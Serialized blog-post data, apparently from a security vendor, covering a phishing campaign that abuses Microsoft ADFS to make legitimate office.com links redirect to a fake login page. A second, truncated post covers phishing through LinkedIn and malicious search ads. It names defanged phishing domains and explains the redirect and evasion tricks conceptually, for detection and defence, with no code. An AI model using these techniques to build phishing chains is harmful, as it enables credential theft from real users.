",{"data":40519,"content":40520,"nodeType":945},{},[40521],{"data":40522,"content":40523,"nodeType":860},{},[40524],{"data":40525,"marks":40526,"value":40527,"nodeType":864},{},[],"Another domain — bluegraintours[.]com — was in the URL path, after which they were redirected to the Microsoft-impersonating phishing site (login-microsoftonline[.]offirmtm[.]com ...). ",{"data":40529,"content":40530,"nodeType":860},{},[40531,40535,40544,40548,40555,40559,40566],{"data":40532,"marks":40533,"value":40534,"nodeType":864},{},[],"This got me wondering — how did they get ",{"data":40536,"content":40538,"nodeType":883},{"uri":40537},"http://office.com",[40539],{"data":40540,"marks":40541,"value":40543,"nodeType":864},{},[40542],{"type":1455},"office.com",{"data":40545,"marks":40546,"value":40547,"nodeType":864},{},[]," to redirect to the phishing site, and why was the bluegraintours domain in the path of an ",{"data":40549,"content":40550,"nodeType":883},{"uri":40537},[40551],{"data":40552,"marks":40553,"value":40543,"nodeType":864},{},[40554],{"type":1455},{"data":40556,"marks":40557,"value":40558,"nodeType":864},{},[]," link? There was no indication that an actual phishing email was interacted with, it seemed to all happen directly from the legitimate ",{"data":40560,"content":40561,"nodeType":883},{"uri":40537},[40562],{"data":40563,"marks":40564,"value":40543,"nodeType":864},{},[40565],{"type":1455},{"data":40567,"marks":40568,"value":40569,"nodeType":864},{},[]," link. ",{"data":40571,"content":40572,"nodeType":1312},{},[40573],{"data":40574,"marks":40575,"value":40577,"nodeType":864},{},[40576],{"type":899},"Redirecting to a malicious login page via ADFS",{"data":40579,"content":40580,"nodeType":860},{},[40581],{"data":40582,"marks":40583,"value":40584,"nodeType":864},{},[],"From memory, I knew that the tenant name can appear in the URL when you’re accessing a specific Microsoft tenant for your organization — essentially a domain-specific landing page. ",{"data":40586,"content":40587,"nodeType":860},{},[40588,40592,40601],{"data":40589,"marks":40590,"value":40591,"nodeType":864},{},[],"It turns out the attacker had set up a custom Microsoft tenant with ",{"data":40593,"content":40595,"nodeType":883},{"uri":40594},"https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/ad-fs-overview",[40596],{"data":40597,"marks":40598,"value":40600,"nodeType":864},{},[40599],{"type":1455},"Active Directory Federation Services (ADFS)",{"data":40602,"marks":40603,"value":40604,"nodeType":864},{},[]," configured. If you’re not familiar, ADFS is an SSO solution that is often used to connect on-premises Active Directory with cloud services like Microsoft 365 or Azure Active Directory. This means Microsoft will perform the redirect to the custom malicious domain. ",{"data":40606,"content":40607,"nodeType":860},{},[40608,40612,40620,40624,40632,40636],{"data":40609,"marks":40610,"value":40611,"nodeType":864},{},[],"This is strikingly similar to ",{"data":40613,"content":40615,"nodeType":883},{"uri":40614},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/samljacking/description.md",[40616],{"data":40617,"marks":40618,"value":5272,"nodeType":864},{},[40619],{"type":1455},{"data":40621,"marks":40622,"value":40623,"nodeType":864},{},[],", a technique I’ve ",{"data":40625,"content":40626,"nodeType":883},{"uri":5231},[40627],{"data":40628,"marks":40629,"value":40631,"nodeType":864},{},[40630],{"type":1455},"blogged about previously",{"data":40633,"marks":40634,"value":40635,"nodeType":864},{},[]," which allows you to change the identity provider domain that an application’s users authenticate through. Attackers can change this link to their phishing page that proxies the legitimate site to phish users through legitimate sign-in links — ",{"data":40637,"marks":40638,"value":40640,"nodeType":864},{},[40639],{"type":899},"so I guess that makes this ADFSjacking?",{"data":40642,"content":40646,"nodeType":996},{"target":40643},{"sys":40644},{"id":40645,"type":1001,"linkType":1002},"3BXyDhMC69355gLRqyIwQP",[],{"data":40648,"content":40649,"nodeType":860},{},[40650],{"data":40651,"marks":40652,"value":40653,"nodeType":864},{},[],"I had initially assumed that bluegraintours was a legitimate website that had been compromised by the attacker and used as a redirect, which is pretty common behavior for threat groups. However, it turns out that it’s actually a fake website that the attackers have probably vibe-coded. ",{"data":40655,"content":40659,"nodeType":996},{"target":40656},{"sys":40657},{"id":40658,"type":1001,"linkType":1002},"1hnWJ0jgsPqRELDqUeFzf3",[],{"data":40661,"content":40662,"nodeType":860},{},[40663],{"data":40664,"marks":40665,"value":40666,"nodeType":864},{},[],"It’s worth noting that this isn’t something that the phishing victim would see as part of the attack — it’s purely used as an invisible redirect. This is most likely to be an attempt to mask the nature of the domain for domain categorization purposes, which is typical for proxy-based solutions to prevent users from browsing to unapproved things — this way, automated scanners will classify it as a travel blog. ",{"data":40668,"content":40669,"nodeType":1312},{},[40670],{"data":40671,"marks":40672,"value":40674,"nodeType":864},{},[40673],{"type":899},"Conditional loading interrupted the page analysis",{"data":40676,"content":40677,"nodeType":860},{},[40678,40682,40690,40694,40701],{"data":40679,"marks":40680,"value":40681,"nodeType":864},{},[],"While the user was taken to the phishing page at the end of the chain, ",{"data":40683,"content":40685,"nodeType":883},{"uri":40684},"https://pushsecurity.github.io/phishing-techniques/techniques/conditional-loading/",[40686],{"data":40687,"marks":40688,"value":28189,"nodeType":864},{},[40689],{"type":1455},{"data":40691,"marks":40692,"value":40693,"nodeType":864},{},[]," restrictions prevented us from recreating the full attack flow when loading the initial link clicked by the user. This happens when certain conditions of the page load aren’t met. Because the kit decides I’m not a valid target, I’m redirected back to ",{"data":40695,"content":40696,"nodeType":883},{"uri":40537},[40697],{"data":40698,"marks":40699,"value":40543,"nodeType":864},{},[40700],{"type":1455},{"data":40702,"marks":40703,"value":40704,"nodeType":864},{},[],". However, we were able to skip ahead and bypass the conditional loading to access the phishing server directly. ",{"data":40706,"content":40710,"nodeType":996},{"target":40707},{"sys":40708},{"id":40709,"type":1001,"linkType":1002},"68rW6CHJOJ2u3mCc08lGvZ",[],{"data":40712,"content":40713,"nodeType":1005},{},[],{"data":40715,"content":40716,"nodeType":1009},{},[40717],{"data":40718,"marks":40719,"value":30578,"nodeType":864},{},[40720],{"type":899},{"data":40722,"content":40723,"nodeType":860},{},[40724,40728,40737],{"data":40725,"marks":40726,"value":40727,"nodeType":864},{},[],"While this isn’t a vulnerability per se, the ability for attackers to add their own Microsoft ADFS server to host their phishing page and have Microsoft redirect to it is a concerning development that will make URL-based detections even more challenging than they already are. ",{"data":40729,"content":40731,"nodeType":883},{"uri":40730},"https://pushsecurity.github.io/phishing-techniques/techniques/trusted-website-hosting/",[40732],{"data":40733,"marks":40734,"value":40736,"nodeType":864},{},[40735],{"type":1455},"Hosting phishing links on trusted third-party websites",{"data":40738,"marks":40739,"value":40740,"nodeType":864},{},[]," is a highly effective way of both bypassing URL-based detections and implementing layers of obfuscation in their phishing delivery chain that can break automated analysis tools.  ",{"data":40742,"content":40743,"nodeType":860},{},[40744,40748,40757],{"data":40745,"marks":40746,"value":40747,"nodeType":864},{},[],"This is basically the equivalent to ",{"data":40749,"content":40751,"nodeType":883},{"uri":40750},"http://outlook.com",[40752],{"data":40753,"marks":40754,"value":40756,"nodeType":864},{},[40755],{"type":1455},"Outlook.com",{"data":40758,"marks":40759,"value":40760,"nodeType":864},{},[]," having an open redirect vulnerability, which would be a huge deal in the eyes of most security practitioners. In practice, it’s a little harder for the average attacker to make use of this, but anyone that is willing to create a Microsoft tenant and set up ADFS could create similar phishing infrastructure  — which only requires passing a credit card check. ",{"data":40762,"content":40763,"nodeType":860},{},[40764,40768,40775,40779,40787],{"data":40765,"marks":40766,"value":40767,"nodeType":864},{},[],"The other notable component to this attack is the use of ",{"data":40769,"content":40770,"nodeType":883},{"uri":40508},[40771],{"data":40772,"marks":40773,"value":441,"nodeType":864},{},[40774],{"type":1455},{"data":40776,"marks":40777,"value":40778,"nodeType":864},{},[]," as the lure delivery channel. This is a trend we spotted recently with ",{"data":40780,"content":40781,"nodeType":883},{"uri":20983},[40782],{"data":40783,"marks":40784,"value":40786,"nodeType":864},{},[40785],{"type":1455},"Scattered Spider’s use of Onfido-based malvertising lures",{"data":40788,"marks":40789,"value":40790,"nodeType":864},{},[],". Malvertising is a great way for attackers to sidestep phishing controls placed at the email layer (where the majority are) and, as in this case, can create a highly-convincing and difficult-to-spot phishing scenario.  ",{"data":40792,"content":40795,"nodeType":996},{"target":40793},{"sys":40794},{"id":27224,"type":1001,"linkType":1002},[],{"data":40797,"content":40798,"nodeType":1005},{},[],{"data":40800,"content":40801,"nodeType":1009},{},[40802],{"data":40803,"marks":40804,"value":40806,"nodeType":864},{},[40805],{"type":899},"Detection recommendations",{"data":40808,"content":40809,"nodeType":860},{},[40810],{"data":40811,"marks":40812,"value":40813,"nodeType":864},{},[],"There are a couple of tool-agnostic hardening options that can used to limit exposure to the specifics of this attack:",{"data":40815,"content":40816,"nodeType":941},{},[40817,40827,40848],{"data":40818,"content":40819,"nodeType":945},{},[40820],{"data":40821,"content":40822,"nodeType":860},{},[40823],{"data":40824,"marks":40825,"value":40826,"nodeType":864},{},[],"Monitoring for ADFS redirects in proxy logs that could be malicious, i.e. login.microsoftonline.com redirecting to another domain with /adfs/ls/ in the path. Many organizations do not use ADFS, while those that do should be able to filter legitimate ones to their legitimate domain relatively easily. ",{"data":40828,"content":40829,"nodeType":945},{},[40830],{"data":40831,"content":40832,"nodeType":860},{},[40833,40837,40844],{"data":40834,"marks":40835,"value":40836,"nodeType":864},{},[],"Monitoring for Google redirects to ",{"data":40838,"content":40839,"nodeType":883},{"uri":40537},[40840],{"data":40841,"marks":40842,"value":40543,"nodeType":864},{},[40843],{"type":1455},{"data":40845,"marks":40846,"value":40847,"nodeType":864},{},[]," with Google ad parameters for more specific detection of malvertising + ADFS hijacking as in this example. ",{"data":40849,"content":40850,"nodeType":945},{},[40851],{"data":40852,"content":40853,"nodeType":860},{},[40854,40858,40867,40870,40879,40882,40891,40894,40903],{"data":40855,"marks":40856,"value":40857,"nodeType":864},{},[],"Deploying ad blockers to all of your browsers to stop malvertising attacks — though this only serves to tackle one of the several possible delivery vectors, such as links delivered using ",{"data":40859,"content":40861,"nodeType":883},{"uri":40860},"https://pushsecurity.github.io/phishing-techniques/techniques/email-legitimate-app/",[40862],{"data":40863,"marks":40864,"value":40866,"nodeType":864},{},[40865],{"type":1455},"legitimate third-party services",{"data":40868,"marks":40869,"value":3731,"nodeType":864},{},[],{"data":40871,"content":40873,"nodeType":883},{"uri":40872},"https://pushsecurity.github.io/phishing-techniques/techniques/social-media/",[40874],{"data":40875,"marks":40876,"value":40878,"nodeType":864},{},[40877],{"type":1455},"social media",{"data":40880,"marks":40881,"value":3731,"nodeType":864},{},[],{"data":40883,"content":40885,"nodeType":883},{"uri":40884},"https://pushsecurity.github.io/phishing-techniques/techniques/instant-messenger/",[40886],{"data":40887,"marks":40888,"value":40890,"nodeType":864},{},[40889],{"type":1455},"instant messenger",{"data":40892,"marks":40893,"value":10291,"nodeType":864},{},[],{"data":40895,"content":40897,"nodeType":883},{"uri":40896},"https://pushsecurity.github.io/phishing-techniques/techniques/email-attachment/",[40898],{"data":40899,"marks":40900,"value":40902,"nodeType":864},{},[40901],{"type":1455},"email attachment",{"data":40904,"marks":40905,"value":40906,"nodeType":864},{},[],". (This is one of the limitations of focusing on specific delivery mechanisms — attackers have more to choose from than ever before. It’s not just an email problem). ",{"data":40908,"content":40909,"nodeType":1005},{},[],{"data":40911,"content":40912,"nodeType":1009},{},[40913],{"data":40914,"marks":40915,"value":3578,"nodeType":864},{},[40916],{"type":899},{"data":40918,"content":40919,"nodeType":860},{},[40920,40924,40930],{"data":40921,"marks":40922,"value":40923,"nodeType":864},{},[],"Push doesn’t detect the redirect tricks, or relies on outdated domain TI feeds. It doesn’t matter what ",{"data":40925,"content":40926,"nodeType":883},{"uri":7124},[40927],{"data":40928,"marks":40929,"value":28345,"nodeType":864},{},[],{"data":40931,"marks":40932,"value":39845,"nodeType":864},{},[],{"data":40934,"content":40935,"nodeType":860},{},[40936],{"data":40937,"marks":40938,"value":40939,"nodeType":864},{},[],"Push’s browser-based security platform provides comprehensive identity attack detection and response capabilities against techniques like AiTM phishing, credential stuffing, password spraying, and session hijacking using stolen session tokens. ",{"data":40941,"content":40942,"nodeType":860},{},[40943],{"data":40944,"marks":40945,"value":40946,"nodeType":864},{},[],"You can also use Push to find and fix identity vulnerabilities across every app that your employees use, including ghost logins; SSO coverage gaps; MFA gaps; weak, breached and reused passwords; risky OAuth integrations; and more.",{"data":40948,"content":40949,"nodeType":860},{},[40950,40954,40962],{"data":40951,"marks":40952,"value":40953,"nodeType":864},{},[],"If you want to learn more about how Push helps you to detect and defeat common identity attack techniques, ",{"data":40955,"content":40956,"nodeType":883},{"uri":5642},[40957],{"data":40958,"marks":40959,"value":40961,"nodeType":864},{},[40960],{"type":1455},"request a demo.",{"data":40963,"marks":40964,"value":21,"nodeType":864},{},[],"How attackers are using Active Directory Federation Services to phish with legit office.com links","Push recently identified a novel phishing attack using Active Directory Federation Services to get Microsoft to send victims to a phishing site.","2025-08-12T00:00:00.000Z","phishing-with-active-directory-federation-services",{"items":40970},[40971,40973],{"sys":40972,"name":342},{"id":6596},{"sys":40974,"name":6593},{"id":6592},{"items":40976},[40977],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":40978},{"url":4955},"new-phishing-campaign-identified-targeting-linkedin-users","blog/new-phishing-campaign-identified-targeting-linkedin-users",{"json":40982},{"data":40983,"content":40984,"nodeType":856},{},[40985],{"data":40986,"content":40987,"nodeType":860},{},[40988],{"data":40989,"marks":40990,"value":40991,"nodeType":864},{},[],"Attackers are increasingly sending phishing lures via non-email delivery channels like social media, instant messaging apps, and search engines. In this article, we’re diving into the latest sophisticated LinkedIn phishing campaign intercepted by Push. ","Diving into the latest sophisticated LinkedIn phishing campaign intercepted by Push. ",{"id":40994,"publishedAt":40995},"4vPEPmjd8MOlARD7oXfOrj","2026-08-12T11:53:41.511Z",{"items":40997},[40998,41000],{"sys":40999,"name":342},{"id":6596},{"sys":41001,"name":6593},{"id":6592},{"items":41003},[41004,41006,41008,41010,41012,41014,41016,41018,41020,41022,41024],{"sys":41005,"name":279,"slug":280,"tier":31},{"id":276},{"sys":41007,"name":519,"slug":520,"tier":31},{"id":516},{"sys":41009,"name":342,"slug":343,"tier":31},{"id":339},{"sys":41011,"name":261,"slug":262,"tier":45},{"id":258},{"sys":41013,"name":324,"slug":325,"tier":45},{"id":321},{"sys":41015,"name":466,"slug":467,"tier":45},{"id":463},{"sys":41017,"name":571,"slug":572,"tier":45},{"id":568},{"sys":41019,"name":475,"slug":476,"tier":45},{"id":472},{"sys":41021,"name":607,"slug":608,"tier":45},{"id":604},{"sys":41023,"name":431,"slug":432,"tier":45},{"id":428},{"sys":41025,"name":351,"slug":352,"tier":45},{"id":348},"V-PiPdbwcE_yIo2Utz3_YGaqkZVdg385zApcJIIGX7w",{"id":41028,"title":41029,"authorsCollection":41030,"content":41035,"extension":228,"faqItemsCollection":41630,"faqTitle":59,"featured":6,"hashTags":59,"meta":41632,"metaTitle":41633,"ogImage":59,"postType":13349,"publishedDate":41634,"relatedBlogPostsCollection":41635,"slug":43108,"stem":43109,"subtitle":59,"summary":43110,"synopsis":43121,"sys":43122,"tagsCollection":43125,"topicsCollection":43131,"__hash__":43163},"blog/blog/why-attackers-are-moving-beyond-email-based-phishing.json","Why attackers are moving beyond email-based phishing",{"items":41031},[41032],{"fullName":2736,"firstName":2737,"jobTitle":2738,"socialLinks":41033,"profilePicture":41034},[18135],{"url":2740},{"json":41036,"links":41582},{"data":41037,"content":41038,"nodeType":856},{},[41039,41047,41054,41061,41068,41074,41077,41085,41092,41099,41115,41157,41163,41170,41186,41193,41199,41202,41210,41217,41233,41253,41271,41291,41298,41301,41309,41327,41358,41363,41368,41371,41379,41397,41417,41424,41444,41449,41455,41458,41466,41473,41480,41510,41517,41520,41528,41535,41542,41549,41556],{"data":41040,"content":41041,"nodeType":1009},{},[41042],{"data":41043,"marks":41044,"value":41046,"nodeType":864},{},[41045],{"type":899},"Phishing has moved outside of the mailbox",{"data":41048,"content":41049,"nodeType":860},{},[41050],{"data":41051,"marks":41052,"value":41053,"nodeType":864},{},[],"Because of the changes to working practices, employees are more accessible than ever to external attackers. Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. ",{"data":41055,"content":41056,"nodeType":860},{},[41057],{"data":41058,"marks":41059,"value":41060,"nodeType":864},{},[],"But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content.",{"data":41062,"content":41063,"nodeType":860},{},[41064],{"data":41065,"marks":41066,"value":41067,"nodeType":864},{},[],"Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration.",{"data":41069,"content":41073,"nodeType":996},{"target":41070},{"sys":41071},{"id":41072,"type":1001,"linkType":1002},"1tDciIJqKnNoR4FqZChjTy",[],{"data":41075,"content":41076,"nodeType":1005},{},[],{"data":41078,"content":41079,"nodeType":1009},{},[41080],{"data":41081,"marks":41082,"value":41084,"nodeType":864},{},[41083],{"type":899},"Why am I not hearing about this more? ",{"data":41086,"content":41087,"nodeType":860},{},[41088],{"data":41089,"marks":41090,"value":41091,"nodeType":864},{},[],"Phishing attacks outside of email usually go unreported. This is to be expected when most of the industry’s data on phishing attacks comes from email security vendors and tools. ",{"data":41093,"content":41094,"nodeType":860},{},[41095],{"data":41096,"marks":41097,"value":41098,"nodeType":864},{},[],"If phishing bypasses the email layer, most organizations are left relying on user reported attacks. Some organizations might supplement this with a web proxy, but these are being increasingly defeated by modern phishing kits, which use an array of obfuscation and detection evasion techniques to bypass these detections. ",{"data":41100,"content":41101,"nodeType":860},{},[41102,41106,41111],{"data":41103,"marks":41104,"value":41105,"nodeType":864},{},[],"The most valuable information for security teams today is the webpage that is loaded ",{"data":41107,"marks":41108,"value":41110,"nodeType":864},{},[41109],{"type":2246},"through",{"data":41112,"marks":41113,"value":41114,"nodeType":864},{},[]," the network traffic: What does the HTML body look like? What is the user likely seeing on the page? To do this, you need to stitch together and reconstruct what the browser is doing by looking at the network data. Except for very simple websites, this happens through JavaScript on the client side. ",{"data":41116,"content":41117,"nodeType":860},{},[41118,41122,41131,41134,41141,41144,41153],{"data":41119,"marks":41120,"value":41121,"nodeType":864},{},[],"This is hard enough when analysing a typical SaaS app. But the latest generation of fully customized Attacker-in-the-Middle (AitM) phishing kits are going out of their way to make this as challenging as possible, using techniques like ",{"data":41123,"content":41125,"nodeType":883},{"uri":41124},"https://phishing-techniques.pushsecurity.com/techniques/dom-obfuscation/",[41126],{"data":41127,"marks":41128,"value":41130,"nodeType":864},{},[41129],{"type":1455},"DOM obfuscation",{"data":41132,"marks":41133,"value":3731,"nodeType":864},{},[],{"data":41135,"content":41136,"nodeType":883},{"uri":35636},[41137],{"data":41138,"marks":41139,"value":39087,"nodeType":864},{},[41140],{"type":1455},{"data":41142,"marks":41143,"value":2232,"nodeType":864},{},[],{"data":41145,"content":41147,"nodeType":883},{"uri":41146},"https://phishing-techniques.pushsecurity.com/techniques/code-obfuscation/",[41148],{"data":41149,"marks":41150,"value":41152,"nodeType":864},{},[41151],{"type":1455},"Code obfuscation",{"data":41154,"marks":41155,"value":41156,"nodeType":864},{},[]," so all you see at a network layer is a garbled, obfuscated mess of JS code.",{"data":41158,"content":41162,"nodeType":996},{"target":41159},{"sys":41160},{"id":41161,"type":1001,"linkType":1002},"71QsaPju68i5QiJcgQlHDs",[],{"data":41164,"content":41165,"nodeType":860},{},[41166],{"data":41167,"marks":41168,"value":41169,"nodeType":864},{},[],"So, non-email phishing is going broadly undetected through technical controls. And even when spotted and reported by a user — what can you really do about it?",{"data":41171,"content":41172,"nodeType":860},{},[41173,41177,41182],{"data":41174,"marks":41175,"value":41176,"nodeType":864},{},[],"Take a social media phish. You can’t see which other accounts were targeted or hit in your user base. Unlike email, there’s no way to recall or quarantine the same message hitting multiple users. There’s no rule you can modify, or senders you can block. You can report the account, and ",{"data":41178,"marks":41179,"value":41181,"nodeType":864},{},[41180],{"type":2246},"maybe",{"data":41183,"marks":41184,"value":41185,"nodeType":864},{},[]," something will happen when the site owner gets around to it — but the attacker has probably got what they needed by then and moved on. ",{"data":41187,"content":41188,"nodeType":860},{},[41189],{"data":41190,"marks":41191,"value":41192,"nodeType":864},{},[],"Most organizations simply block the URLs involved. But this doesn’t really help when attackers are rapidly rotating their phishing domains — by the time you block one site, another three have already taken its place. ",{"data":41194,"content":41198,"nodeType":996},{"target":41195},{"sys":41196},{"id":41197,"type":1001,"linkType":1002},"1II2kHyOZcShLsexx1TAgy",[],{"data":41200,"content":41201,"nodeType":1005},{},[],{"data":41203,"content":41204,"nodeType":1009},{},[41205],{"data":41206,"marks":41207,"value":41209,"nodeType":864},{},[41208],{"type":899},"But aren’t these just personal accounts?",{"data":41211,"content":41212,"nodeType":860},{},[41213],{"data":41214,"marks":41215,"value":41216,"nodeType":864},{},[],"Modern phishing attacks blur the boundary between corporate and personal. The fact is that your employees are routinely accessing personal messaging and social media apps on their corporate devices. Users are signed into apps like LinkedIn, X, WhatsApp, Signal, even message boards like Reddit on their work laptop and/or mobile devices. And with malicious links being found on search engines (aka. malvertising), they can even stumble upon them while browsing the web normally.",{"data":41218,"content":41219,"nodeType":860},{},[41220,41224,41229],{"data":41221,"marks":41222,"value":41223,"nodeType":864},{},[],"In short: anywhere that your users can be contacted by someone outside of your organization presents an opportunity for phishing. In fact, in most of these cases people ",{"data":41225,"marks":41226,"value":41228,"nodeType":864},{},[41227],{"type":899},"expect ",{"data":41230,"marks":41231,"value":41232,"nodeType":864},{},[],"to be contacted by people they don’t know. ",{"data":41234,"content":41235,"nodeType":860},{},[41236,41240,41249],{"data":41237,"marks":41238,"value":41239,"nodeType":864},{},[],"It’s also a myth that campaigns can’t be targeted in the same way on these platforms, that they’re somehow more random and therefore less dangerous. For example, social media accounts are some of the easiest for attackers to create en masse — or take over. According to the most recent ",{"data":41241,"content":41243,"nodeType":883},{"uri":41242},"https://www.verizon.com/business/resources/T149/reports/2025-dbir-data-breach-investigations-report.pdf",[41244],{"data":41245,"marks":41246,"value":41248,"nodeType":864},{},[41247],{"type":1455},"Verizon DBIR",{"data":41250,"marks":41251,"value":41252,"nodeType":864},{},[],", 60%+ of creds found in infostealer logs were from social media sites. They’re also likely to use single-factor logins. If an attacker can take over one account, and use it to credibly communicate with one of your employees, they have a way higher likelihood of being successful than with your average unsolicited email. ",{"data":41254,"content":41255,"nodeType":860},{},[41256,41260,41267],{"data":41257,"marks":41258,"value":41259,"nodeType":864},{},[],"Malicious ads can also be targeted. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Phishing sites also often come with ",{"data":41261,"content":41262,"nodeType":883},{"uri":26883},[41263],{"data":41264,"marks":41265,"value":28189,"nodeType":864},{},[41266],{"type":1455},{"data":41268,"marks":41269,"value":41270,"nodeType":864},{},[]," parameters to only deliver the malicious payload under specific conditions — for example, only if the visitor came from a particular email campaign link, or only if they are in a certain organization, using a certain browser, from a specific IP range, etc. ",{"data":41272,"content":41273,"nodeType":860},{},[41274,41278,41287],{"data":41275,"marks":41276,"value":41277,"nodeType":864},{},[],"And even if the attacker only manages to reach your employee on their personal device, this can still be laundered into a corporate account compromise. Just look at the ",{"data":41279,"content":41281,"nodeType":883},{"uri":41280},"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause",[41282],{"data":41283,"marks":41284,"value":41286,"nodeType":864},{},[41285],{"type":1455},"2023 Okta breach",{"data":41288,"marks":41289,"value":41290,"nodeType":864},{},[],", where an attacker exploited the fact that an Okta employee had signed into a personal Google profile on their work device. This meant any credentials saved in their browser were synced to their personal device — including a customer support system service account providing access to 134 customer tenants. When their personal device got hacked, so too did all of their work credentials.",{"data":41292,"content":41293,"nodeType":860},{},[41294],{"data":41295,"marks":41296,"value":41297,"nodeType":864},{},[],"So, there’s plenty of scope for non-email phishing to result in targeted phishing campaigns. If anything, it’s arguably less work for the attacker to spin up these non-email campaigns than it is to do the necessary legwork to create and build up email sender reputation!",{"data":41299,"content":41300,"nodeType":1005},{},[],{"data":41302,"content":41303,"nodeType":1009},{},[41304],{"data":41305,"marks":41306,"value":41308,"nodeType":864},{},[41307],{"type":899},"Case study: LinkedIn spear-phishing",{"data":41310,"content":41311,"nodeType":860},{},[41312,41315,41323],{"data":41313,"marks":41314,"value":21,"nodeType":864},{},[],{"data":41316,"content":41317,"nodeType":883},{"uri":39132},[41318],{"data":41319,"marks":41320,"value":41322,"nodeType":864},{},[41321],{"type":1455},"Attackers recently ran a LinkedIn spear-phishing campaign targeting tech company execs.",{"data":41324,"marks":41325,"value":41326,"nodeType":864},{},[]," The victims were targeted via LinkedIn direct message from another exec about a fake investment opportunity. The sender’s account had been compromised and used to approach high-value targets. ",{"data":41328,"content":41329,"nodeType":860},{},[41330,41334,41342,41346,41354],{"data":41331,"marks":41332,"value":41333,"nodeType":864},{},[],"The attack led the victim through a chain of custom pages hosted on ",{"data":41335,"content":41336,"nodeType":883},{"uri":39038},[41337],{"data":41338,"marks":41339,"value":41341,"nodeType":864},{},[41340],{"type":1455},"legitimate sites",{"data":41343,"marks":41344,"value":41345,"nodeType":864},{},[]," (a well-known ",{"data":41347,"content":41349,"nodeType":883},{"uri":41348},"https://pushsecurity.com/resources/phishing-evolution?",[41350],{"data":41351,"marks":41352,"value":7129,"nodeType":864},{},[41353],{"type":1455},{"data":41355,"marks":41356,"value":41357,"nodeType":864},{},[],") such as Google Sites, Google Search, and Microsoft Dynamics, before serving up an Attacker-in-the-Middle phishing page impersonating Google Workspace, before serving up a session-stealing AitM phishing page. ",{"data":41359,"content":41362,"nodeType":996},{"target":41360},{"sys":41361},{"id":39406,"type":1001,"linkType":1002},[],{"data":41364,"content":41367,"nodeType":996},{"target":41365},{"sys":41366},{"id":39461,"type":1001,"linkType":1002},[],{"data":41369,"content":41370,"nodeType":1005},{},[],{"data":41372,"content":41373,"nodeType":1009},{},[41374],{"data":41375,"marks":41376,"value":41378,"nodeType":864},{},[41377],{"type":899},"Case study: Google Search malvertising",{"data":41380,"content":41381,"nodeType":860},{},[41382,41385,41393],{"data":41383,"marks":41384,"value":21,"nodeType":864},{},[],{"data":41386,"content":41387,"nodeType":883},{"uri":20983},[41388],{"data":41389,"marks":41390,"value":41392,"nodeType":864},{},[41391],{"type":1455},"A company was hit with a targeted Google ad",{"data":41394,"marks":41395,"value":41396,"nodeType":864},{},[]," which was designed to look highly convincing, and positioned above the legitimate ad. This took advantage of the fact that many users will search for login pages rather than accessing the site via bookmark. ",{"data":41398,"content":41399,"nodeType":860},{},[41400,41404,41413],{"data":41401,"marks":41402,"value":41403,"nodeType":864},{},[],"In this case, the attacker had made use of a ",{"data":41405,"content":41407,"nodeType":883},{"uri":41406},"https://phishing-techniques.pushsecurity.com/techniques/rentable-subdomains/",[41408],{"data":41409,"marks":41410,"value":41412,"nodeType":864},{},[41411],{"type":1455},"rentable subdomain",{"data":41414,"marks":41415,"value":41416,"nodeType":864},{},[]," (us[.]com) to make the link appear highly legitimate, with only small changes to the real URL that were easy to miss. ",{"data":41418,"content":41419,"nodeType":860},{},[41420],{"data":41421,"marks":41422,"value":41423,"nodeType":864},{},[],"Instead of the real login, the link took the victim to a session-stealing AITM page.  ",{"data":41425,"content":41426,"nodeType":860},{},[41427,41431,41440],{"data":41428,"marks":41429,"value":41430,"nodeType":864},{},[],"This was later traced back to a ",{"data":41432,"content":41434,"nodeType":883},{"uri":41433},"https://pushsecurity.com/blog/scattered-spider-ttp-evolution-in-2025/",[41435],{"data":41436,"marks":41437,"value":41439,"nodeType":864},{},[41438],{"type":1455},"Scattered Spider",{"data":41441,"marks":41442,"value":41443,"nodeType":864},{},[]," campaign.",{"data":41445,"content":41448,"nodeType":996},{"target":41446},{"sys":41447},{"id":39916,"type":1001,"linkType":1002},[],{"data":41450,"content":41454,"nodeType":996},{"target":41451},{"sys":41452},{"id":41453,"type":1001,"linkType":1002},"4RAXFNPdvUXjMDUE7tc10a",[],{"data":41456,"content":41457,"nodeType":1005},{},[],{"data":41459,"content":41460,"nodeType":1009},{},[41461],{"data":41462,"marks":41463,"value":41465,"nodeType":864},{},[41464],{"type":899},"What can an attacker do with a compromised account? ",{"data":41467,"content":41468,"nodeType":860},{},[41469],{"data":41470,"marks":41471,"value":41472,"nodeType":864},{},[],"It’s important to think about the bigger picture when it comes to a modern phishing compromise. ",{"data":41474,"content":41475,"nodeType":860},{},[41476],{"data":41477,"marks":41478,"value":41479,"nodeType":864},{},[],"Most phishing attacks focus on core enterprise cloud platforms such as Microsoft and Google, or specialist Identity Providers like Okta. Taking over one of these accounts doesn’t just give access to the core apps and data within the respective app, but also enables the attacker to leverage SSO to sign into any connected app that the employee logs into with their account. ",{"data":41481,"content":41482,"nodeType":860},{},[41483,41487,41495,41499,41506],{"data":41484,"marks":41485,"value":41486,"nodeType":864},{},[],"This gives an attacker access to just about every core business function and dataset in your organization. And from this point, it’s much easier to target other users of these internal apps — using internal messenger apps like ",{"data":41488,"content":41489,"nodeType":883},{"uri":19030},[41490],{"data":41491,"marks":41492,"value":41494,"nodeType":864},{},[41493],{"type":1455},"Slack or Teams",{"data":41496,"marks":41497,"value":41498,"nodeType":864},{},[],", or techniques like ",{"data":41500,"content":41501,"nodeType":883},{"uri":40614},[41502],{"data":41503,"marks":41504,"value":5272,"nodeType":864},{},[41505],{"type":1455},{"data":41507,"marks":41508,"value":41509,"nodeType":864},{},[]," to turn an app into a watering hole for other users trying to log in. ",{"data":41511,"content":41512,"nodeType":860},{},[41513],{"data":41514,"marks":41515,"value":41516,"nodeType":864},{},[],"A single account compromise can quickly snowball into a multi-million dollar, business-wide 